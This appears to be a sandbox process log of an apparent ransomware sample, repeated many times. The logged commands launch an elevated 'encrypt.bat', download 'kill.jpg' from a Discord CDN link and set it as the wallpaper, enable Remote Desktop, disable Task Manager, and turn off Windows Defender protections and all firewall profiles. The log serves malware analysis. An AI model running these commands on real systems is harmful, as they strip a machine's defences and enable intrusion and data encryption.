powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

